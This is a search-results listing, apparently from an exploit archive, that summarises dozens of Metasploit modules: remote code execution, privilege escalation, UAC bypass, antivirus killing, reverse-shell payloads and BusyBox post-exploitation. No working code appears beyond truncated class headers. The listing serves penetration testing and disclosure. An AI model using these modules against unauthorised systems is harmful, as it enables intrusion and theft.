6845 matches found
Watchguard XCS Remote Command Execution
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other...
Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
This module exploits an unsafe intent URI scheme and directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private wifi manager activity, which starts a web server for Mercury on port 8888. The webserver also suffers a directory traversal...
ManageEngine EventLog Analyzer Remote Code Execution
This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6 build 10060 and previous versions. Every authenticated user, including the default "guest" account can execute SQL queries directly on the underlying Postgres database server. The queries are executed as the...
Portmapper Amplification Scanner
This module can be used to discover Portmapper services which can be used in an amplification DDoS attack against a third party. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Portmapper...
MS15-100 Microsoft Windows Media Center MCL Vulnerability
This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution. This module requires Metasploit: https://metasploit.com/download Current source:...
Nibbleblog File Upload Vulnerability
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
CMS Bolt File Upload Vulnerability
Bolt CMS contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 2.2.4. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CMS...
Simple Backdoor Shell Remote Code Execution
This module exploits unauthenticated simple web backdoor shells by leveraging the common backdoor shell's vulnerable parameter to execute commands. The SecLists project of Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells which is categorized under Payloads...
MS15-078 Microsoft Windows Font Driver Buffer Overflow
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed in the July data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. This module requires...
Jenkins-CI Unauthenticated Script-Console Scanner
This module scans for unauthenticated Jenkins-CI script consoles and executes the specified command. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'cgi' class MetasploitModule 'Jenkins-CI Unauthenticated...
WordPress NextGEN Gallery Directory Read Vulnerability
This module exploits an authenticated directory traversal vulnerability in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing to read arbitrary directories with the web server privileges. This module requires Metasploit: https://metasploit.com/download Current source:...
UPnP IGD SOAP Port Mapping Utility
Manage port mappings on UPnP IGD-capable device using the AddPortMapping and DeletePortMapping SOAP requests This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'nokogiri' class MetasploitModule 'UPnP IGD SOAP Por...
BusyBox DMZ Configuration
This module will be applied on a session connected to a BusyBox shell. It allows to manage traffic forwarding to a target host through the BusyBox device. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
BusyBox DNS Configuration
This module will be applied on a session connected to a BusyBox shell. It allows to set the DNS server on the device executing BusyBox so it will be sent by the DHCP server to network hosts. This module requires Metasploit: https://metasploit.com/download Current source:...
BusyBox Download and Execute
This module will be applied on a session connected to a BusyBox shell. It will use wget to download and execute a file from the device running BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
BusyBox SMB Sharing
This module will be applied on a session connected to a BusyBox shell. It will modify the SMB configuration of the device executing BusyBox to share the root directory of the device. This module requires Metasploit: https://metasploit.com/download Current source:...
BusyBox Ping Network Enumeration
This module will be applied on a session connected to a BusyBox shell. It will ping a range of IP addresses from the router or device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
BusyBox Jailbreak
This module will send a set of commands to an open session that is connected to a BusyBox limited shell i.e. a router limited shell. It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell. This module requires Metasploit: https://metasploit.com/download...
BusyBox Enumerate Host Names
This module will be applied on a session connected to a BusyBox shell. It will enumerate host names related to the device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
BusyBox Enumerate Connections
This module will be applied on a session connected to a BusyBox shell. It will enumerate the connections established with the router or device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Windows Gather Active Directory Groups
This module will enumerate AD groups on the specified domain. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Active Directory Groups', 'Description' = %q This module will...
Android Meterpreter Browsable Launcher
This module allows you to open an android meterpreter via a browser. An Android meterpreter must be installed as an application beforehand on the target device in order to use this. For best results, you can consider using the auxiliary/client/sms/sendtext to trick your target into opening the...
PHP Meterpreter, Reverse TCP Inline
Connect back to attacker and spawn a Meterpreter server PHP This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 34928 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp...
w3tw0rk / Pitbul IRC Bot Remote Code Execution
This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 'Description' = %q...
Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Escalate UAC...
Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerabilit...
Mac OS X "tpwn" Privilege Escalation
This module exploits a null pointer dereference in XNU to escalate privileges to root. Tested on 10.10.4 and 10.10.5. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X "tpwn" Privilege...
Firefox PDF.js Privileged Javascript Injection
This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability. This module requires Metasploit:...
Firefox PDF.js Browser File Theft
This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR 38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with privileges to read local files...
Watermark Master Buffer Overflow (SEH)
This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF...
Multi Recon Local Exploit Suggester
This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It's important to note that not all local exploits will be fired. Exploits are...
VideoCharge Studio Buffer Overflow (SEH)
This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a maliciou...
WordPress Mobile Pack Information Disclosure Vulnerability
This module exploits an information disclosure vulnerability in WordPress Plugin "WP Mobile Pack" version 2.1.2, allowing to read files with privileges information. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework clas...
WordPress Subscribe Comments File Read Vulnerability
This module exploits an authenticated directory traversal vulnerability in WordPress Plugin "Subscribe to Comments" version 2.1.2, allowing to read arbitrary files with the web server privileges. This module requires Metasploit: https://metasploit.com/download Current source:...
Symantec Endpoint Protection Manager Authentication Bypass and Code Execution
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution...
BIND TKEY Query Denial of Service
This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x...
Heroes of Might and Magic III .h3m Map file Buffer Overflow
This module embeds an exploit into an uncompressed map file .h3m for Heroes of Might and Magic III. Once the map is started in-game, a buffer overflow occurring when loading object sprite names leads to shellcode execution. This module requires Metasploit: https://metasploit.com/download Current...
SMB Group Policy Preference Saved Passwords Enumeration
This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES key. This module has been tested successfully on a Win2k...
Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation
In Apple OS X 10.10.4 and prior, the DYLDPRINTTOFILE environment variable is used for redirecting logging data to a file instead of stderr. Due to a design error, this feature can be abused by a local attacker to write arbitrary files as root via restricted, SUID-root binaries. This module requir...
Sticky Keys Persistence Module
This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting for certain...
SysAid Help Desk 'rdslogs' Arbitrary File Upload
This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in an insecure way. By combining both weaknesses, a remote attacker can accomplish...
WordPress All-in-One Migration Export
This module allows you to export Wordpress data such as the database, plugins, themes, uploaded files, etc via the All-in-One Migration plugin without authentication. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
OpenSSL Alternative Chains Certificate Forgery MITM Proxy
This module exploits a logic error in OpenSSL by impersonating the server and sending a specially-crafted chain of certificates, resulting in certain checks on untrusted certificates to be bypassed on the client, allowing it to use a valid leaf certificate as a CA certificate to sign a fake...
Windows Post Kill Antivirus and Hips
This module attempts to locate and terminate any processes that are identified as being Antivirus or Host-based IPS related. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Post Kill...
Adobe Flash opaqueBackground Use After Free
This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This...
VNC Keyboard Remote Code Execution
This module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems a xterm terminal is opened and a payload is typed and executed. This module...
X11 Keyboard Command Injection
This module exploits open X11 servers by connecting and registering a virtual keyboard. The virtual keyboard is used to open an xterm or gnome terminal and type and execute the specified payload. This module requires Metasploit: https://metasploit.com/download Current source:...
Western Digital Arkeia Remote Code Execution
This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below. The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are insufficient checks on the authentication of all clients, this can be bypassed. Using the ARKFSEXECCMD...
Accellion FTA 'statecode' Cookie Arbitrary File Read
This module exploits a file disclosure vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'statecode' cookie parameter is appended to a file path that is processed as a HTML template. By prepending this cookie with directory traversal...
Accellion FTA getStatus verify_oauth_token Command Execution
This module exploits a metacharacter shell injection vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'oauthtoken' is passed into a system call within a modperl handler. This module exploits the '/tws/getStatus' endpoint. Other vulnerabl...